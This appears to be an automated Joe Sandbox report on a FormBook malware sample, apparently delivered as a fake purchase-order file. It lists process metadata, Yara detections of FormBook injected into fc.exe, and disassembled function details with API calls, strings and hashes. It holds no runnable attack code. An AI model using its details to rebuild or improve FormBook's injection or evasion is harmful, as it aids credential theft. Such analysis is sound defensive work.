Path:	C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
Imagebase:	0x140000000
File size:	16'696'840 bytes
MD5 hash:	731FB4B2E5AFBCADAABB80D642E056AC
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	04:08:29
Start date:	07/01/2025
Path:	C:\Windows\SysWOW64\fc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\fc.exe"
Imagebase:	0x910000
File size:	22'528 bytes
MD5 hash:	4D5F86B337D0D099E18B14F1428AAEFF
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.23285133806.00000000036A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.23283972486.00000000030A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.23285045111.0000000003650000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	04:08:53
Start date:	07/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff643a90000
File size:	597'432 bytes
MD5 hash:	FA9F4FC5D7ECAB5A20BF7A9D1251C851
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	1.3%
Dynamic/Decrypted Code Coverage:	5.8%
Signature Coverage:	8.3%
Total number of Nodes:	156
Total number of Limit Nodes:	11

Executed Functions

Function 00C38B13 Relevance: 2.9, Strings: 2, Instructions: 433
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

", xrefs: 00C38E02
", xrefs: 00C38E7E

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID: "$"
API String ID: 0-3758156766
Opcode ID: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
Instruction ID: f9b6e09138e1e58ec0483fe23358cd3f1efe96af68c1a4a46688b8c571c59119
Opcode Fuzzy Hash: 063b6d386616b1ea3c6fec4a094d4e4aa879a73abadd00f48a304ef7574ee870
Instruction Fuzzy Hash: 9CF183B1D1021AAFDF24DB64CC85AAEB7B9BF44304F1481A9F519A7241DB709E49CFA0

Function 00C21B91 Relevance: 2.9, Strings: 2, Instructions: 382
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

qi, xrefs: 00C21AD3
gfff, xrefs: 00C21D08

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID:
String ID: gfff$qi
API String ID: 0-3408824469
Opcode ID: ef9c79e329e7f0cd7239ae138573222c9514b1c93849ea54341abe59cc75f781
Instruction ID: 5d198ab76dfcef67156887b47a559392fbab0dcaee60a22eb83b0bcd424baec8
Opcode Fuzzy Hash: ef9c79e329e7f0cd7239ae138573222c9514b1c93849ea54341abe59cc75f781
Instruction Fuzzy Hash: CFB1C0726453764FC71A8A2CAC526E87B55EB75324F1C02BEDC51CF9D3E6118A1287C0

Function 00C37CA3 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00C37D15

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
Instruction ID: d55b62eefb282719e6ffa66f43c03db35fb28a4462701124f18709ba1ebba5a3
Opcode Fuzzy Hash: a4c9aebcca78bf2c79862b32e3806d5fc13de4f3c4e116857794fabdc04dc3bf
Instruction Fuzzy Hash: 7B011EB5D0020DABDB10DBA4DC42FEEB778AB54304F1042A5E91897240F671EB599B91

Function 00C4CB43 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 00C4CB7A

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
Instruction ID: 61416972dcfcae6e78bd8734465ee85f025074dd31b752cae403012b23be6179
Opcode Fuzzy Hash: 4475380e52142e82ee3346c97f1c1c9fb8c96161e239dd7ee8ef83ea55ab2f30
Instruction Fuzzy Hash: 59E04672604254BBD620FA59DC02F9BB76CEFC5710F008555FA59A7242CAB1B91187F0

Function 01042B90 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01042B9A

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 12632b247d83e46100899ba80ffe9737852f26f13ac5ed4fb855e8774a7b4a12
Instruction ID: 377d32b1d56e984f51f951dd42ebadd8291dbebd8cb0009320900ff4c06aee42
Opcode Fuzzy Hash: 12632b247d83e46100899ba80ffe9737852f26f13ac5ed4fb855e8774a7b4a12
Instruction Fuzzy Hash: 8E90023120108812D6506159D50475B0005D7D0301F55C816AC814658DC6A588917121

Function 01042BC0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01042BCA

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bd87a9fd6c8efe26060fc229caddfe370b483a592f40ca6e340db44e12dde76f
Instruction ID: 5fdd6a3227502f1d91233c641330140fa0ca1fc5e3d281c87eae8ed08884f04a
Opcode Fuzzy Hash: bd87a9fd6c8efe26060fc229caddfe370b483a592f40ca6e340db44e12dde76f
Instruction Fuzzy Hash: A390023120100412D6406599A5086570005D7E0301F51D416AD414555EC67588917131

Function 01042A80 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01042A8A

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2a5593ae44ffaba142ea89c378f38cf24568fcff11d86aaf48f761745d210f8a
Instruction ID: fb575d543bcd02ead94129576657da3e8b5b90c5bddfd94a051e157b0a3a9174
Opcode Fuzzy Hash: 2a5593ae44ffaba142ea89c378f38cf24568fcff11d86aaf48f761745d210f8a
Instruction Fuzzy Hash: 8190027120200013864571599514627400AD7E0201B51C426E9404590DC53588917125

Function 01042D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01042D1A

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4692ba41c8fcd4d5688d8bdf5982ed0270d64eec7f4573477021b99c306c5b54
Instruction ID: 277dfe487f2297b91f76cb9e66597595ddf25dc9af31852a4d14d38ab18fed97
Opcode Fuzzy Hash: 4692ba41c8fcd4d5688d8bdf5982ed0270d64eec7f4573477021b99c306c5b54
Instruction Fuzzy Hash: 3890023120100423D651615996047170009D7D0241F91C817A8814558DD6668952B121

Function 01042EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01042EBA

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d098eb1623da638352008fa796ab06cb45f246661495db57aebc947736f6ffd0
Instruction ID: e63eab13841474108e51f98ef9612216ed855341aa8a2525762550a43c6fde88
Opcode Fuzzy Hash: d098eb1623da638352008fa796ab06cb45f246661495db57aebc947736f6ffd0
Instruction Fuzzy Hash: 0390043130140413D740715DDD1471F0005D7D0303F51C417FD554555DC735CC517571

Function 010434E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 010434EA

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9b47244d285a7dae1b4e539006dd9f76abe342b9b76f5a1806573acfbe027d84
Instruction ID: 1d645199311dd4a91272d27de40ac9e69eea00b51ede95f786205ec538103c5c
Opcode Fuzzy Hash: 9b47244d285a7dae1b4e539006dd9f76abe342b9b76f5a1806573acfbe027d84
Instruction Fuzzy Hash: 8090023160510412D640615996147171005D7D0201F61C816A8814568DC7A5895175A2

Function 00C344C1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 69
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 00C3456A

Strings

17O3k-2I, xrefs: 00C3455F, 00C34569, 00C3457A
17O3k-2I, xrefs: 00C34571, 00C34574

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 17O3k-2I$17O3k-2I
API String ID: 1836367815-2455829943
Opcode ID: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
Instruction ID: 6bf63c2480a1a4ef563aa2e934bba71ef08a767ec0433db3da9048b69613c735
Opcode Fuzzy Hash: fcc73c7b8cc7b4af6ded3372faa6a9cb8a3cf5fe988ec8993084df4fd089c6da
Instruction Fuzzy Hash: 301123B2D441587ADB11DBA08C81EEE7F7CEF40398F0480A9F954AB202D3749A068BA0

Function 00C344F3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(17O3k-2I,00000111,00000000,00000000), ref: 00C3456A

Strings

17O3k-2I, xrefs: 00C3455F, 00C34569, 00C3457A
17O3k-2I, xrefs: 00C34571, 00C34574

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 17O3k-2I$17O3k-2I
API String ID: 1836367815-2455829943
Opcode ID: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
Instruction ID: 7c7521deaa04ee601da874d3594a483fb80cd669a5f5f68a670336962e308fbd
Opcode Fuzzy Hash: 20b814a7f5afbd628b3306073f99bc8e32a910d4eb99ef896f182a05ec17f2cf
Instruction Fuzzy Hash: E10192B2D0025C7BDB10EBE59C82DEF7B7CEF41794F058069FA14A7141D6649E068BA1

Function 00C4CEB3 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,00018623,00000007,00000000,00000004,00000000,00C37514,000000F4), ref: 00C4CEEF

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
Instruction ID: ac8a82d34513923242a3a4f38d8fb44f1e763e53ffb5186910f0dfa02112ff98
Opcode Fuzzy Hash: 4da538de4a336ad0334eb70f56b6e4fc79bf1a1573d1aefafb213d21a41e79ef
Instruction Fuzzy Hash: 7BE06DB1604204BBD614EE58EC41F9B37ACEFC8710F004018F918A7242C7B1B9118BB4

Function 00C4CE63 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00C3EA4E,?,?,00000000,?,00C3EA4E,?,?,?), ref: 00C4CEA2

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
Instruction ID: 4333ac1509b92a2e760ee03547e012004249c11805ed6bb3194837b9a7bc58ea
Opcode Fuzzy Hash: 3f90dd9010fafa6a22c10d148e61cf8cfc03c1fbbda787b6d6695d8e77fb27a4
Instruction Fuzzy Hash: 1BE06DB2614244BBD614EE58DC42EAB77ACEF88710F004059FA08A7242C7B0B91086B4

Function 00C4CF03 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,00000000,?,004D1854,?,?,004D1854), ref: 00C4CF33

Memory Dump Source

Source File: 00000000.00000002.22425930183.0000000000C21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.22425875607.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.22426016644.0000000000C67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_PO_62401394_MITech_20250601.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
Instruction ID: da6cec3b89b12097c6b031e52223441b3563768a3ffd55135d6f5f29702bbb00
Opcode Fuzzy Hash: 5230a997c7839df9915626ca5e5720bb1dd2af9a8acc6ab531059eb0aa4f8316
Instruction Fuzzy Hash: 06E08C326006147BC620FA59EC01F9B77ACDFC5711F1080A5FA08A7286DAB1B9108BF4

Function 01042B2A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01042B44

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c13541fc5952a1986e61f6d5a00b77aab3fba68d2850348bec553ea1021d7ab3
Instruction ID: 7218c159ae778888fa6ac880c798841d511ced0476782b1260749c61418b54f3
Opcode Fuzzy Hash: c13541fc5952a1986e61f6d5a00b77aab3fba68d2850348bec553ea1021d7ab3
Instruction Fuzzy Hash: 1FB09B719014C5D6DB51D76457087177940B7D0701F15C466E5860641F8778C091F175

Non-executed Functions

Function 00FF6868 Relevance: 19.0, Strings: 15, Instructions: 249COMMON

Download Yara Rule

Strings

SE_InstallAfterInit, xrefs: 00FF68FB
SE_DllUnloaded, xrefs: 00FF6955
SE_ProcessDying, xrefs: 00FF69AF
SE_LdrResolveDllName, xrefs: 00FF69DC
Could not locate procedure "%s" in the shim engine DLL, xrefs: 01059942
SE_GetProcAddressForCaller, xrefs: 00FF6A09
SE_LdrEntryRemoved, xrefs: 00FF6982
SE_InitializeEngine, xrefs: 00FF6875
ApphelpCheckModule, xrefs: 00FF6A36
SE_ShimDllLoaded, xrefs: 00FF68A1
LdrpGetShimEngineInterface, xrefs: 01059948
SE_DllLoaded, xrefs: 00FF6928
minkernel\ntdll\ldrinit.c, xrefs: 01059952
apphelp.dll, xrefs: 00FF693A
SE_InstallBeforeInit, xrefs: 00FF68CE

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-3089669407
Opcode ID: b858c481a6893f7eea54d49ffc3acb2f7dcfef8631cc49bc60450dc650c04190
Instruction ID: 66d9c114426b5f6352e15d348a80304239f1a3e6d9027ff8ffbca33f16669251
Opcode Fuzzy Hash: b858c481a6893f7eea54d49ffc3acb2f7dcfef8631cc49bc60450dc650c04190
Instruction Fuzzy Hash: B28142B2D01209BF8B61EED8ED86EDF77BDAB04754B044426BA40E7514E735ED049BA0

Function 010A5490 Relevance: 18.5, Strings: 14, Instructions: 963COMMON

Download Yara Rule

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!, xrefs: 010A5604
PreferredUILanguagesPending, xrefs: 010A5D52
@, xrefs: 010A5F20
InstallLanguageFallback, xrefs: 010A5BD0
LanguageConfiguration, xrefs: 010A5FA0
Control Panel\Desktop, xrefs: 010A5CDE
@, xrefs: 010A5BA7
\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 010A5B61
LanguageConfigurationPending, xrefs: 010A5DA1
PreferredUILanguages, xrefs: 010A5F51
@, xrefs: 010A5DF7
@, xrefs: 010A5D30
@, xrefs: 010A5FFA
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 010A5EDD

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlpSetPreferredUILanguages is not a valid multi-string!$@$@$@$@$@$Control Panel\Desktop$InstallLanguageFallback$LanguageConfiguration$LanguageConfigurationPending$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1325123933
Opcode ID: 90ac8afd537ed632ae80f44d39ce9d0ae3b6cbd7869621d21c56bdfb68aecfcf
Instruction ID: 3d1b7c7c5f435953ca6cb7477331853daa0a4738dd852e20b95d029da4ebe1fe
Opcode Fuzzy Hash: 90ac8afd537ed632ae80f44d39ce9d0ae3b6cbd7869621d21c56bdfb68aecfcf
Instruction Fuzzy Hash: C2727A715083419FD365DFA8C890BABBBE9FB88710F84492DFAC5D7250E731E8458B92

Function 01038540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

Thread is in a state in which it cannot own a critical section, xrefs: 0107534E
undeleted critical section in freed memory, xrefs: 01075236
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010752D9
8, xrefs: 010750EE
Critical section debug info address, xrefs: 0107522A, 01075339
corrupted critical section, xrefs: 010752CD
Critical section address., xrefs: 0107530D
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01075215, 010752A1, 01075324
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 010752ED
Critical section address, xrefs: 01075230, 010752C7, 0107533F
double initialized or corrupted critical section, xrefs: 01075313
Address of the debug info found in the active list., xrefs: 010752B9, 01075305
Invalid debug info address of this critical section, xrefs: 010752C1
Thread identifier, xrefs: 01075345

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: e3d0af33c16438e82b3eedaacc5653ce8cdd2d59b332e5a265992aa1170122d9
Instruction ID: ab882d2e04502fa0a935b869a28fc32b5d97f21f6d0c283b0fb884f847b6c592
Opcode Fuzzy Hash: e3d0af33c16438e82b3eedaacc5653ce8cdd2d59b332e5a265992aa1170122d9
Instruction Fuzzy Hash: FB818B70E40358AFDB20DF95CD41BAEBBB9FB48B10F208159F988A7280C775A941CB65

Function 01032919 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

@, xrefs: 010723A5
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01072310
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 0107240C
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 0107242E
RtlpResolveAssemblyStorageMapEntry, xrefs: 01072429
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 010723F5
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 010720EE
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 010722A2
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 0107221C
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01072213
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 010722CA

Memory Dump Source

Source File: 00000000.00000002.22426295599.0000000000FD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.22426295599.00000000010F9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.22426295599.00000000010FD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_PO_62401394_MITech_20250601.jbxd

Similarity

API ID:
